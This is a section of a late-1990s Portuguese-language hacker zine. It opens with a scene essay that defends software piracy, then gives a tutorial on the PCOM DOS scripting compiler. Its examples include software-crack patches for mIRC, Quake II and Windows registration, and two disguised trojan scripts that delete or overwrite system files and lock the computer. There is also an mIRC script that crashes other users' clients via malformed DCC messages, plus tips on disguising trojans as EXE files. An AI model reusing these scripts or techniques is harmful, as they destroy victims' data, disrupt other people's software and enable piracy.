that started with rip eventually moved into hirez. lit never has been 
respected, most doodleboys can hardly read let alone appreciate fine 
literary art, but oh well, noone cares. if you would like to see examples 
of each form of art, as well as a breakdown of what each means, click right
here

the warez scene has remained strong due to the obvious reason of necessity.
 warez is simply the sceners term for pirating software. most of the world 
has them painted as the ones that are driving up the prices and are costing
 the industry billions of dollars in lost revenue every year, I personally 
think thats bullshit. its easy to justify pirating. the reason that many 
people cannot afford to buy these applications, is one way. if we wernt 
able to pirate software this would mean that we would be hindered by money 
like the rest of the world when it comes to our education. software 
applications such as kenetix 3dsmax can cost upwards of three thousand 
dollars. a lot of people respect kenetix, however, will never pay for the 
application because of its enormous cost. does it bother you to know that
a lot of the best artists out there started on pirated software such as 
3dsmax and from there have been able to get jobs in huge design firms and 
have been able to move forward with thier life. now that i have justified 
pirating in some meanial way, lets explain whats involved with this section
of the scene. the warez scene is also gathered together in groups,
however, they dont release packs, they just release software, some of these
groups are responsible for cracking and releasing software, and some of
them are responsible for making them so accessible to the common world. if 
you go to yahoo.com and type warez, you'll see just how close this warez 
scene is to the outside world.

The h/p/a scene is much more complex and generally requires that you know A 
LOT about computers, networks telephones, telephone systems, and an enormous
amount of other electrical things. the movie "hackers" represented the 
hacking scene in a way that wasnt too well liked inside the scene. the 
events portrayed at the beginning of the movie were real, but the real life
"zerocool" known by another name is still in jail waiting to receive a 
hearing. the movie was a big time fake and didnt show anything that would 
impress the scene, but the dedication and the general message they were 
offering was represented pretty well. 
You might get a kick out of kevin mitnicks page 

I personally dont know much about the hacking scene and I want to keep it 
that way, I dont mess with them they dont mess with me. in my years, i've 
learned not to f#$* with them. they can f#$* much harder.

In the past these scenes were meshed together tightly, the art scene drawing
for the warez and hpa scenes, the warez scene offering the software for the
art and hpa scene, and everyone respected eachother even greeted eachother 
in thier releases, its a little different nowdays and somtimes it seems that
the art scene receives no respect when it comes to the warez scene, and the
hpa scene doesnt want to have anything to do with either of the two.

Eh isso...
Esqueci o endereco da page de onde eu tirei isso ;(
Por isso nao colocarei creditos, se alguem souber qual e a page, e so avisar
que na proxima edicao a gente diz o endereco ;)
Se voce ficou interessado em saber mais sobre o que esta acontecendo na
"scene", alguns bons URLs sao:

www.acid.org
www.acheron.org
www.defacto2.net

cya d00dz!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 11 - Our Products
                  
    tOneOne
                     -

Junto ao zine vao dois programas(logread.sh e backmaker.sh) que eu fiz, um uti-
litario para ler logs eu um programa para fazer backdoors.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 12 - Private Compiler (PCom)
                  
    BigBen
                     -


* INTRODUZINDO(hmmm :) *
     Private Compiler pode ser a nova palavra de programacao para os beg de 
plantao! Ou entao pode ser uma 'naum muito poderosa' linguagem de programacao
para crackers que naum saibam programar. Imagine juntar a utilidade do ASM 
com a facilidade de um programa de lote(.bat). Temos Private Compiler! Nessa 
materia vou  explicar todos os seus comandos(acho q sao no maximo 40) e a 
utilidade de cada um, voce tera o link direto para download e tal.. Learn 
iz thA woRd!
                                                -- BiGBeN

* A LINGUAGEM *
     Private  Compiler(ou simplesmente PCOM), eh baseada em tags de linha, 
que voce coloca no comeco, vamos explicar, comparado-a com arquivo .bat(lote,
:P):
 ;Private Compiler
 @Seja bem-vindo ao Del Logs para scripts!
 @By SrFulano de Tal
 $run:del *.log

 ;Arquivo de Lote
 echo Seja bem-vindo ao Del Logs para scripts!
 echo By SrFulano de Tal
 del *.log
- Aih, eu exemplifiquei um "Del Log Script" para scripts de mIRC e tal... 
Comp are as duas liguagens e tire suas conclusoes.
     Voce pensa: "Ora porra, jah que eu tenho o .BAT, para que irei precisar
do PCOM?". Hmm, tenho a resposta bem aki: Arquivos de LOTE podem mover BYTES 
de arquivos normais? Como assembly? Nice tool for crackers...

* EXEMPLO 1 *
     Aqui,  vou mostrar como patchar o mIRC, para ficar com o HackPHR Group 
como registro principal... Thanx QuIcK_DeAtH!

 ;Patch for mIRC 4.52+
 @mIRC Patcher by HackPHR Group
 @Special thanx to: QuIcK_DeAtH
 @
 @Pressione qualquer tecla para iniciar...
 $key
 #mircpch.reg
 "[HKEY_CURRENT_USER\Software\mIRC\name]
 .
 "@="HackPHR Group"
 .
 .
 "[HKEY_CURRENT_USER\Software\mIRC\code]
 .
 "@="!{kg|6:<9>8CA=8EA"
 .
 .
 "[HKEY_USERS\.Default\Software\mIRC\name]
 .
 "@="HackPHR Group"
 .
 .
 "[HKEY_USERS\.Default\Software\mIRC\code]
 .
 "@="!{kg|6:<9>8CA=8EA"
 -
 $run:regedit mircpch.reg
 $run:del mircpch.reg >nul
 @Fim do patch!
 ; Fim

- Pronto! Acho que voce jah deve ter notado para que alguns comandos servem
entao vamos a eles!

* OS COMANDOS *
     Tipo, como naum posso descrever todos by myself, irei mostrar a parte 
que consta no help file dele:(shit, in english, bah!)

 The valid script commands are the following:                                
                                                                             
        ;...             = Comments.                                         
                                                                             
        @...             = Output ... to screen.                             
                           Note: A CR/LF will be added.                      
                           Technical: The standard interrupt is used, so a   
                                      line will and with a '$'-sign.         
                                                                             
        @~!:...          = Output ... to screen without a newline.           
                           Note: This command makes it possible to create    
                                 better input dialog with the user. Using    
                                 the @~!:... before a ?... will make the     
                                 cursor stand behind the question and not    
                                 underneath it.                              
                                                                             
        @~xx:...         = Colored ... output to screen, xx is the hex       
                           notated color value which can be found using the  
                           PCOM /o command.                                  
                           Note: A CR/LF will be added.                      
                                                                             
        +...             = Open file ... in read/overwrite/add mode.         
                           Note: File existence is automatically implemented.
                                 So when file ... does not exist, the        
|                                 string 'File not found!' will be displayed  
|                                 and the XXXXX.COM will exit to dos with     
|                                 errorlevel 1. You can overwrite old code    
|                                 and append new at the and of the file.      
|                                 If you want to use the =... function, open  
|                                 the file in this mode!                      
|                                                                             |
|        +...>...         = Like +..., but shows the 2nd ... on the standard  |
|                           'File not found!'-message. This way you can use   |
|                           your own error message.                           |
|                           Examp: +TEST.EXE>Well, 'test.exe' is not found!   |
|                                                                             |
|        #...             = Creates new file ... in append mode.              |
|                           Note: Now you are able to create text files like  |
|                                 *.REG and *.KEY files.                      |
|                                                                             |
:        .                = Write CR/LF                                       |
:                           Note: The CR/LF in the "... line is removed, so   |
:                                 this could be rotten with text files. By    |
:                                 using the DOT you can create a CR/LF.       :
:                                                                             :
:        -                = Close the open file                               :
:                           Note: The file system works LIFO, so if you       :
:                                open more then one file, the first file to   :
:                                close is the last file opend.                :
:                                                                             :
:        >xxxx:xxxx       = Move file pointer from start to xxxx:xxxx.        :
:                           (32-bits searcher, 4096 Mb, able).                :
:                           Note: Remember that byte 1 of the file is at      :
:                                 position 0000:0000!                         :
:                                                                             :
:        |xxxx:xxxx       = Move the file pointer from current position       :
:                           to the current + xxxx:xxxx.                       :
:                                                                             :
:        <xxxx:xxxx       = Move the file pointer xxxx:xxx positions backwards:
:                           from the current file position (hex).             :
:                                                                             :
:        )                = Move the file pointer to the end of the file.     :
:                           Note: You can add text or code at the and of the  :
:                                 file opened with +... or #...               :
:                                                                             :
:        (                = Pretty useless function, because a file is already:
:                           at this position when you open it. BUT it might   :
:                           be usefull when you want to check a byte first and:
:                           then want to modify the begin of it. (You can     :
:                           also write >0000:0000).                           :
:                                                                             :
:        "...             = Write string ... into the open/created file.      :
:                           Note: The CR/LF will be skipped. Use the . command:
:                                 for writing a newline into a file.          :
:                                                                             :
:        '...             = Write code ... into the open/created file. (hex). :
:                                                                             :
:        *...             = Append footer in the output file.                 :
:                           Note: You can place the *... code anywhere in     :
:                                 the script, but the footer will be placed   :
:                                 at the end of the .COM/.EXE. You can add one:
:                                 footer!                                     :
:                                                                             :
:        =...             = Check byte ... with the byte of file pointer pos. :
:                           Note: Handy for checking the validity of the file :
:                                 you want to patch.                          :
:                                                                             :
:        ?...             = Get user input and place it in the ... variable.  :
:                           Note: ?Variable will create a variable called     :
:                                 %Variable%. The name is not case sensitive  :
:                                 and may be almost as long as you like (132  :
:                                 characters).                                :
:                                                                             :
:        !...             = Check the filesize from the currently open file.  :
:                           The ... size is in bytes and decimal notated.     :
:                           Syntax: !4672329                                  :
:                           Note: This function differce from earlier PCOM    :
:                                 versions (PCOM v2.7beta9 and lower). The    :
:                                 compiler checks on the old style !...:...   :
:                                 command. The command is optimized, smaller  :
:                                 and is able to support long filenames.      :
:                                 The command does NOT effect the current     :
:                                 fileposition.                               :
:                                                                             :
:        &RHS:...         = Change the attribute of file ...  Uppercase will  :
:                           set the attribute, lowercase will reset the       :
:                           attribute.                                        :
:                           Note: No file existence check is done.            :
:                                                                             :
:        $key             = Wait for a key (without echo).                    :
:                                                                             :
:        $snd             = Lets the internal bleeper bleep.                  :
:                                                                             :
:        $con             = Sets the cursor on.                               :
:                                                                             :
:        $cof             = Sets the cursor off.                              :
:                                                                             :
:        $cls             = Clears the screen.                                :
:                           Note: This option will undo the already used      :
:                                 $cof and $chr command!                      :
:                                                                             |
|        $chr             = Set 40x25 character text mode.                    
                           Note: Just for a fancy lay-out.                   
                                ( The $cls sets the 80x25 charakter mode ).  
                                                                             
        $chl             = Set 80x50 character text mode.                    
                                                                             
        $lck             = Locks the computer. So you'll force the user to   
                           reboot.                                           
                                                                             
        $y/n             = Y/y will continue the program, all other keys will
                           terminate your created program.                   
                           Example: Are you sure [y/n]?                      
                                    ->@Are you sure [y/n]?                   
                                    ->$Y/N                                   
                           If you press any other key then Y or y, the       
                           program quits with errorlevel 1. Normally is quits
                           with errorlevel 0.                                
                           Note: With 'the program' we main your created     
                                 .EXE/.COM file.                             
                                                                             
        $sbd             = Set boot drive.                                   
                           Note: I needed this for patching the IO.SYS.      
                                                                             
        $prn             = Generate a print-screen ( always funny ;)         
                                                                             
        $win             = Check if running under Windows.                   
                           If not, the standard message 'This program cannot 
                           run in DOS mode.' is shown. The executable will   
                           quit with ERRORLEVEL 1.                           
                                                                             
        $fdb             = Full windowed dos-box.                            
                           Tested in Win95/98/NT, does not harm in plain DOS.
                                                                             
        $ufn             = Create and open a file with an unique filename.   
                           Note: Filenames would be like: BA49F132.          
                                                                             
        $case            = Create a menu case using the { and }.             
                           Note: Cases may not be nested.                    
|                                                                             
|        $dsk:x           = Change to drive X:                                |
|                                                                             |
|        $rep:x           = Repeat x times the codelines between { and }.     |
|                           Note: Loops may be nested.                        |
|                                                                             |
|        $ccs:xx          = Clear colored screen, xx is the colornumber which |
|                           can be found using the PCOM /o command. xx is hex |
|                           notated.                                          |
|                                                                             |
|        $ccl:xx          = Clear colored line, xx is the colornumber which   |
|                           can be found using the PCOM /o command. xx is hex |
|                           notated.                                          |
|                                                                             |
|        $cur:x,y         = Change the cursors position.                      |
|                           Example: Set cursor on 1,2 : $cur:1,2             |
|                                    Where 1 is horizontal positioning and    |
|                                    2 is vertical positioning.               |
|                                    Set cursor at 1,23 : $cur:1,23.          |
|                                    Set cursor at 40,2 : $cur:40,2.          |
|                           Note: 0,0 is the origin af the screen!            |
|                                                                             |
|        $ren:x>y         = Rename file x into y.                             :
|                                                                             :
:        $cdr:...         = Change to directory ...                           :
:                           Note: Use dubble \ for the root. This is a kind of:
:                                 caused by the C++ manner of string typing.  :
:                                                                             :
:        $rdr:...         = Remove directory ...                              :
|                                                                             :
|        $mdr:...         = Make directory ...                                :
|                                                                             |
|        $del:...         = Delete file ...                                   |
                                                                             
        $num:...         = Switches numlock status. Use 'ON' to switch it on 
                           or 'OFF' to switch it off.                        
                                                                             
        $cap:...         = Switches capslock status. Use 'ON' to switch it   
                           on or 'OFF' to switch it off.                     
                                                                             
        $slp:...         = This is a vertical retrace delay. You can adjust  
                           the time by changing the ... value. This value is 
                           an integer value, so large sizes will be          
                           truncated.                                        
                                                                             
        $inc:...         = Includes script ... into the current script.      
                           Note: This could be handy for a LOGO.SCR with     
                                 your synonymous or groupname.               
                                 You may include as much include files as    
                                 you like, but include files may NOT contain 
                                 include files. (With other words, include   
                                 file may not be nested).                    
                                                                             
        $fnt:...         = Load the ... fontfile. The fontfile layout is a   
                           standard binary raw format. Depending on the      
                           filesize, the correct textmode will be set.       
                           Note: Remember to change to a full dosbox within  
                                 Windows95/98/NT, because the font is        
                                 emulated within a dosbox, so that the new   
                                 font wouldn't be visible.                   
                                                                             
        $fnd:...         = Find the hexadecimal stream ... in the open file. 
                           If the stream isn't found, the executable will    
                           quit using ERRORLEVEL 1 and a 'Occurrence not     
                           found!'-message. (... is hex notated).            
                           Technical: The search starts from the current     
                                      file pointer position. When the        
                                      occurrence is found, the file pointer  
                                      will be at the end of the occurrence.  
                                                                             
        $run:...         = Executes the '...' files or command.              
                           Note: This could be a internal/external or        
                                 Windows 95 command. You will return to the  
                                 compiled script afterwards. When the command
                                 is not executed the program quits with      
                                 errorlevel 3 and the 'File is not executed!'
                                 string.                                     
                                                                             
        $ttl:...         = Change Windows(95/NT) messagebox-title into ...   
                                                                             
        $exit:x          = Exit using ERRORLEVEL x.                          
                                                                             
        $far:xx>yy       = Find xx and replace it with yy.                   
                           The xx and yy must be hex.                        
                           Example: In an executable you'll like to change   
                                    the string Abba into Fija. Well, first   
                                    you run PCOM /t to determine the hex     
                                    values of the chars, then you create a   
                                    script with the following line:          
                                    $far:41626261>46696a                     
                                    Run the script and the patch is done!    
                                    Notice that the length of the strings do 
                                    need to have the same length.            
                           Technical: The routine recognizes the stream,     
                                      moves the file pointer back to the     
                                      beginning of the stream and overwrites 
                                      it.                                    
                                                                             
        $hex:%1>%2       = Convert var %1 into hex and stores it in new var  
                           %2.                                               
                           Example: $hex:%Name%>HexName. You need to create  
                                    the variable %Name% first by using the   
                                    ?... command (?Name). A new variable     
                                    %HexName% is created.                    
                                    Input: Me in var %1 will be 4D65 in var  
                                    %2.                                      
                                                                             
        $dec:%1>%2       = Convert var %1 into dec and stores it in new var  
                           %2.                                               
                           Example: $dec:%Name%>DecName. You need to create  
                                    the variable %Name% first by using the   
                                    ?... command (?Name). A new variable     
                                    %DecName% is created.                    
                                    Input: Me in var %1 will be 077101 in    
                                    var %2.                                  
                                                                             
        $var:%1>..       = Copies .. into the new '%1'-variable.             
                           Example: $var:%Filename%>TASK1.EXE. This will     
                                    create a variable called 'Filename' with 
                                    the stream 'TASK1.EXE' as contense. This 
                                    variable is available for all supported  
                                    routines, #..., @... etc.                
                                                                             
        $vbc:..>%1       = Copies binary data into the new variable '%1'.    
                           Note: This options enables you to use codes like  
                                 07,08,0A,0D,20 etc. in your variables.      
                                                                             
        $vcp:%1>%2       = Copies variable %1 into variable %2.              
                           The contense of variable %2 will be overwritten.  
                                                                             
        $vct:%1>%2       = Appends the contense of variable %1 behind        
                           variable %2.                                      
                           Example: %1 = "ABC", %2="XYZ". The command        
                                    $vct:%1>%2 will create following stream  
                                    in variable %2: "XYZABC".                
                                                                             
        $vtr:%1>xx       = Truncates variable '%1' to length xx (xx=dec).    
                           If the length of '%1' already is smaller then xx  
                           this function doen't do anything.                 
                           Example: var1='MyNameHere' using the $vtr:%var1%>6
                                    will result in var1='MyName'.            
                                                                             
        $vup:%1          = Uppercase variable '%1'.                          
                           Example: 'HeLlo' will be 'HELLO'.                 
                                                                             
        $vlw:%1          = Lowercase variable '%1'.                          
                           Example: 'HeLlo' will be 'hello'.                 
                                                                             
        $sound:x,y       = Play sound x for y periods of time.               
                                                                             
        $nosound         = Switch off the sound.                             
                                                                             
        ansi             = Define a ANSI screen. See ANSI method.            
                                                                             
 A script command line may start with spaces or tabs, those charakters will  
 be skipped by the compiler. So you're able to make a fancy layout (pshaw).  
 You can comment the commands without the '...' or ':???' i.e. -, ., $key,   
 $cls, $snd, $con, $cof, $prn and $chr.                                      
                                                                             

Sacou? Foi mal mesmo.. mas ingles eh preciso :(. Mas eu tb sou gente! Preciso
estudar! heheh, por incrivel que pareca! Amanha tem prova.. sux.


* EXEMPLO 2 -- Pegando User Data *
     Nesse exemplo quero mostrar como voce pode fazer uma variavel e assumir
um valor a ela:
 ;Programa: Get Data
 @Get Data v1.0 
 @~!:Digite seu nome:
 ?myname
 @Seu nome eh:
 @%myname%
 ;EOF
Voce pode notar, que para assumir uma variavel, uso o comando '?'. Por
exemplo: '?hackphr', o compilador ira assumir como %hackphr%. Facil.
E o comando '@~!:', serve para o compilador naum fazer o CR/LF. Ou seja,
ficaria assim:
Digite seu nome: _
OBS: _ = ao cursor.
Ez...

* EXEMPLO 3 -- Trojan Horse *
     Nao eh exatamente um trojan, mas dah pra disfarcar! Tipo.. temos o 
comando '$lck', que trava o computador.. Temos $run.. veja:

 ;Trojan Horse em PCOM
 ;Soh exemplo..
 ;Ele apaga arquivos essenciais para o windows
 ;-
 ;Temos que disfarcar o programa, certo?
 ;Tipo isso:
 $ttl:The 7th Deadly Sins
 @Zip Self-Extract v1.0 by John Malvino
 @UNREGISTERED VERSION
 @
 @Program Name: The 7 Deadly Sins
 @Program Type: mIRC Script
 @Authors: Fabulous and egito
 @Press any key to continue...
 $key
 ;Gostaram?! :), todo mundo usa esse script(nah), entao que tal disfarcar?
 $run:cd\
 $run:del autoxec.bat >nul
 @Extracting: c:\7TDS\... 10%
 $del:config.sys
 $run:cd windows
 $del:win.com
 $del:*.ini
 @c:\7TDS\.. CRC ERROR at 5eab88dj it would be 8ssj27dh, continue on next file
 @Press any key...
 ;Caso o garotao pressione, say goodbye!
 $key
 @Sorry, but your computer was infected... cya!
 @:(, eh a vida... lame
 $lck

- Hu! Gostaram? Tipo.. vamos explicar linha por linha..
 $ttl:The 7th Deadly Sins ; No Windows, quando roda o prompt, fica esse nome
                            lah em cima, na titlebar
 @Zip Self-Extract v1.0 by John Malvino ; Echo para user screen
 @UNREGISTERED VERSION ; echo
 @ ; hm, linha em branco
 @Program Name: The 7 Deadly Sins ; no comments
 @Program Type: mIRC Script
 @Authors: Fabulous and egito
 @Press any key to continue...
 $key ; isso faz o cursor esperar por uma resposta do usuario, equivale ao
        PAUSE dos arquivos de lote.
 $run:cd\ ; $run significa q o script ira executar um comando do ms-dos.
          ; no caso, cd\
 $run:del autoxec.bat >nul ; olha o $run de novo! o >nul serve para o user nao
                             receber o echo do ms-dos, naum queremos que ele p
                             ressione ctrl-c, nao?
 @Extracting: c:\7TDS\... 10% ; echo
 $del:config.sys
 $run:cd windows
 $del:win.com
 $del:*.ini
 @c:\7TDS\.. CRC ERROR at 5eab88dj it would be 8ssj27dh, continue on next file
 @Press any key...
 $key ; jah expliquei..
 @Sorry, but your computer was infected... cya!
 @:(, eh a vida... lame
 $lck ; agora, o computador trava! e claro, obrigando o user a reiniciar..


* EXEMPLO 4 -- Patch na pratica *
     Aqui vou mostrar o source de um patch para Quake II, feito pelo ExeD(o cara
que programou o PCOM, veja a hp dele no final, lah eh cheio de patches). Esse
patch, tira o CD CHECKER do Quake II(full cd version.. claro):

 ;Quake II patch
 @~0a: QUAKE II CD-Check Remover 
 @
 +quake2.exe
 @ Procurando e patchando...
 $far:803800750f>803800eb0f
 -
 @ Okay!


-Bem, linha por linha, iremos aprender..
 @~0a: QUAKE II CD-Check Remover  ; Linha colorida! Sim, digite pcom -o para
                                      ver todas as cores diposniveis(em hex)
 @ ; linha em branco
 +quake2.exe ; abrir o arquivo quake2.exe, caso ele nao ache o arquivo ira mos
               strar 'File not Found!'.
 @ Procurando e patchando...
 $far:803800750f>803800eb0f ; hmm... a funcao do $far e achar uma string em hex
                              e substituir por outra, em hex tb. patch!
 - ; fecha e salva o arquivo, muito importante, sempre especifique isso.
 @ Okay!

-Improving.. Podemos aumentar a capacidade do nosso patch... como?

 @~0a: QUAKE II CD-Check Remover 
 @
 @ Fazendo backup...
 $run:copy quake2.exe c:\ >nul
 @ Renomeando...
 $run:c:
 $run:cd\
 $run:ren quake2.exe quake2.bak
 @ O backup esta localizado em C:\QUAKE2.BAK! Nao se esqueca...
 +quake2.exe
 @ Procurando e patchando...
 $far:803800750f>803800eb0f
 -
 @ Okay! Pode jogar sem o cd agora!

-Bem, o que fizemos... Copiamos o quake2.exe para  a raiz, levando em conta,
q se eu renomeasse o arquivo no diretorio do quake,  o patch naum iria 
encontrar o arquivo... Tenha cuidado nesses minimos detalhes..  Isso eh igual
a matematica, tenha cuidado no desevolvimento, para nao  dar um resultado 
errado. :), levando em conta q eu odeio matematica hehehe :P.


* EXEMPLO 5 -- Re-registrando o windows *
OBS: by ExEd
     Okay, simples e facil. Caso foi o seu papai que registrou o vosso
sistema operacional, ele deve tah com o nome do seu papaizinho! Ohh, q lindo.
Mas claro que nao queremos isso, sim?

$cls
@Windows 95 Registry Patcher.
@
@This patcher is used to alter the registration details of the owner of the
@software.
@
@eg.  The installation disks have been used too many times, and you now have
@     to see
@
@            Registered to:
@              John Smith
@              Another Company
@              xxx-xxx-xxxxxxx
@
@     Whenever you check the registration details...
@
@
@     All you have to do to re-register Windows 95 to your name is run this
@     program after installing Win 95, and your problems are over...
$key
$cls
@Enter your name...
?Name
@
@Enter the company name...
?Company
@
@Enter a registration number...(xxxxx-OEM-xxxxxxx-xxxxx)
?Regnum
@
@All correct ? (y/N)
$y/n
$cls
#rereg95.reg
"REGEDIT4
.
.
"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\]
.
.
""RegisteredOwner"="
"%Name%
""
.
""RegisteredOrganization"="
"%Company%
""
.
""ProductId"="
"%Regnum%
""
-
$cls
$run:REGEDIT /s rereg95.reg
$del:rereg95.reg
$cls
$snd
@Done!


-Review line per line.. hm.. english sux

$cls ; Clear Screen
@Windows 95 Registry Patcher. ; echo...
@
@This patcher is used to alter the registration details of the owner of the
@software.
@
@eg.  The installation disks have been used too many times, and you now have
@     to see
@
@            Registered to:
@              John Smith
@              Another Company
@              xxx-xxx-xxxxxxx
@
@     Whenever you check the registration details...
@
@
@     All you have to do to re-register Windows 95 to your name is run this
@     program after installing Win 95, and your problems are over...
$key ; esperar q o usuario pressione alguma tecla..
$cls ; clear screen
@Enter your name...
?Name ; hm, jah expliquei isso.. Veja o topic FAZENDO VARIAVEIS.
@
@Enter the company name...
?Company
@
@Enter a registration number...(xxxxx-OEM-xxxxxxx-xxxxx)
?Regnum
@
@All correct ? (y/N) ; Hm..
$y/n ; Okay, let me xplain.. Ele vai esperar que voce digite Y ou N, caso voce
       digite qualquer outra tecla, ele vai sair do programa com um errorlevel
       entao, induza ao usuario pressionar as teclas CORRETAS... 
$cls ; clear
#rereg95.reg ; inicia um novo arquivo chamado rereg95.reg(exemplo 1)
"REGEDIT4 ; escreve no arquivo
. ; isso eh o CR/LF, caso voce naum coloque isso, ele vai continuar na mesma
    linha, no caso REGEDIT4...
. ; dois espacos de linha.. preste atencao
"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\]
.
.
""RegisteredOwner"="
"%Name%
""
.
""RegisteredOrganization"="
"%Company%
""
.
""ProductId"="
"%Regnum%
""
-
$cls
$run:REGEDIT /s rereg95.reg ; roda o rereg95.reg
$del:rereg95.reg ; deleta o arquivo
$cls
$snd ; isso faz aquele bipzim chatooo.. (internal beep)
@Done!

-Uma observacao.. Quando voce escreve em um arquivo, usando uma variavel, gera
lmente iriamos colocar isso:
 "NickName=
 "%MeuNick%
 Mas esta errado! Temos que colocar duas " na ultima palavra..
 ""NickName"="
 "%MeuNick%
 Essa eh uma dica realmente muito util, pois as vezes, precisamos pegar o nome
ou numero serial do usuario! Tome cuidado com esses detalhes..

* EXEMPLO 6 -- mIRCKill... *
     Aqui vou mostrar o source de um addonzim que eu fiz, para killar o mIRC 5
.4. Eu jah fiz uma materia sobre ele...

@ͻ
@HackPHR Group       
@Self-Extract File   
@ͼ
@
@  Tipo: Addon para mIRC
@  Nome: mIRC 5.4 Killer
@  Versao: 1.0
@  Descricao: Killa os usuarios de mIRC 5.4 *ONLY*
@
@
@Pressione qualquer tecla para comecar o extract.
$key
@  Agora extraindo MIRCKILL.MRC....
@Aguarde....
#mirckill.mrc
";mIRC Killer v1.0 by BiGBeN
.
.
";Para ligar o MASSKILL MODE, digite: /mirckill @on e depois /mirckill #canal
.
";Para desligar, digite: /mirckill @off
.
";Para mostrar o total de kills, digite: /mirckill @show
.
"OBS: Caso o MASSKILL MODE esteja ligado e voce fizer um /CTCP NICK VERSION, e a pessoa usar mIRC 5.4, ela ira ser killada!
.
.
"alias he echo -a mIRCKiLL -> $1-
.
"alias mirckill {
.
"  if ($1 == @on) { %mirckill = bye | he Ligado | halt } 
.
"  if ($1 == @off) { %mirckill = nope | he Desligado | halt }
.
"  if ($1 == @show) { he You KilleD %kill.count LaMMaH's | halt }
.
"  if (# isin $1) { he Killando $1 | .ctcp $1 version | halt }
.
"  if (%kill.count == $null) { %kill.count = 0 } 
.
"  inc %kill.count
.
"  he mIRC Kill - Say bye to $1 - Total kills: %kill.count
.
"  .raw privmsg $1 :DCC SEND Como_Hackear_o_IRC.txt 600000000 6525 
.
"  .raw privmsg $1 :DCC RESUME 63.txt
.
"}
.
"on 1:ctcpreply:version* {
.
"  if ((v5.4 isin $parms) && (v5.41 !isin $parms) && (%mirckill == bye)) { mirckill $nick }
.
"}
.
-
@Fim de MIRCKILL.MRC
@Fim do package.

-Ae, nao vou explicar o source, pois alem de ser um source muito facil, eu 
jah falei muito sobre esse tipo de arquivo.. :).


* EXEMPLO 7 -- Patchando um programa *
     Hm, aqui eu vou mostrar, um exemplo que vem com o PCOM, como patchar!Hm!

+Arquivo YN.UUE -> Descompacte
begin 666 Yn.zip
M4$L#!!0````(`,VN=1RM).395````%@````&````64XN0T]-V\*YRX;QK.(6
MAK-B-GDE?#9^)5PVE27<-I$E[*^Y7O`PO&9]P<_PFF$'@P]0$><N7Z#:PT`Z
M&$3S<KGFE:06*417ZN?%*E@IJ%2F%O-RJ>3E`PD`4$L!`A0`%`````@`S:YU
M'*TDY-E4````6`````8````````````@`/^!`````%E.+D-/35!+!08`````
.`0`!`#0```!X````````
`
end
+End
-Aih esta o arquivo que voce ira patchar. Descompate-o, voce vera YN.COM.

 +yn.com
 >0000:000C
 "y
 >0000:0010
 "Y
 >0000:0014
 "n
 >0000:0018
 "N
 -yn.com
 @Agora okay! O patch foi feito.

-Bem, o programinha YN, eh muito simples. Ele perguntar "Enter [y/n]:", caso
voce digite Y, ele ira responder no, caso voce digite N, ele ira responder 
yes. Entao, esse simples source, mostra como patcha-lo. Line by line, we 
goes...

+yn.com ; abre o arquivo YN.COM para escrever.
>0000:000C ; move 0000:000C para o comeco do arquivo
"y ; escreve em YN.com
>0000:0010 ; move...
"Y ; ...
>0000:0014
"n
>0000:0018
"N
-yn.com ; fecha o YN.COM e SALVA. Essa opcao eh muito importante.
@Agora okay! O patch foi feito. ; echo

-Um simples exemplo de patch! Agora.. Do by yourself ;)...


* EXEMPLO 8 - Mais um trojan.. *
     Nao resisti! Resolvi escrever mais um exemplo.. Nesse outro trojanzim,
nos iremos mover alguns bytes do command.com e win.com, sem nenhuma 
finalidade somente para acabar com eles!

 ;Little Trojan Proogie
 @Welcome to Program Tal v1.0
 @THIS IS A SHAREWARE COPY. So, beware.
 @
 @Looking for config files...
 $dsk:c
 $run:cd\
 +command.com
 >0000:00a0
 "Tipo.. bye e tal..
 >0000:12a0
 -command.com
 @Config file not found!
 @Trying backup file...
 $run:cd\windows
 +win.com
 >0030:00a3
 >0032:112b
 -win.com
 @y0u'r3 n0w v11r3d!
 @trojan made by The Lammah Master
 $lck

-Hm, caso voce queira explicacao sobre esse exemplo.. Mande um mail!


* ADDONS *
     O PCOM tem alguns programas a mais, que podemos considerar ADDONS. 
Veja a lista abaixo:

NOME                  -   DESCRICAO
----------------------|-------------------------------------------------------
PCOM Frame Builder      Faz frames, para os proggies ficarem mais cools!
PCOM Font Maker         Faz fontes para PCOM! Para usar suas fonte: $fnt:nome.
Reg2SRC                 Pega os arquivos .reg, e transforma em .SRC. Util.

     Para pegar todos esses addons, vah em:
     http://members.xoom.com/bben/pcom-add.zip
     

* MAIS EXEMPLOS *
     Voce pode achar mais exemplos no propio PCOM, vem com o package alguns
exe's uteis e tal.. Qualquer duvida MANDE UM E-MAIL! Responderei com prazer... :)


* COMPILANDO O SEU PROOGIE *
     Bem, eis a linha de comando para fazer .EXE's:
 pcom nome[.src] -i -x
     Caso queira transformar o seu source code em ASM(assembly), faca isso:
 pcom nome[.src] -a
     Se voce compilar sem nenhuma opcao, ira ficar .COM, nao recomendavel 
caso voce queira pegar alguem com trojans, pois a maioria sabe que .COM eh 
de asm,e que os asm's saum virus! Uma questao de gosto ;).


* ONDE PEGAR! PELAMORDIDEUS! huuhu *
     Tipo: http://members.xoom.com/bben/pcom27!.zip
     Home-Page do ExeD: http://huizen.ddl.nl/~exed
     Pode ir lah e tal...

* FINALIZANDO *
     Como essa eh a minha primeira materia.. alguns agradecimentos...
     ThaNx GoeS To:
      <----
     _-alanis-_ (hmm :***) SPECIAL SUPER HIPER THANX!
      ---->
     aR00To (hm...)
     MrIRON (me aprensentou a galera da hackphr, thanx d00d!)
     Art.Int. (hm, suspect! :)
     MAMAE, PAPAI olha eu aqui! :)))
     Linus Torvalds
     Bill Gates (hm...)
     Meu Tio Aldenor... Senao eu nao estaria aqui escrevendo isso...
     Meu modem
     Meu teclado
     Charles Miller
     Martin Luther King
     Graham Bell
     Nelson Mandela
     ! Kurt Cobain    \
     ! Dave Grohl       > sem eles, vida sem sentido.
     ! Cris Novoselic /
     ExEd (fez o pcom.. hm..)
     MaNdRaCk_, QuIcK_DeAtH, B0mB4sT1c (por suportarem as merda q 
     eu falo ;)
     E a toda galera da HackPHR...


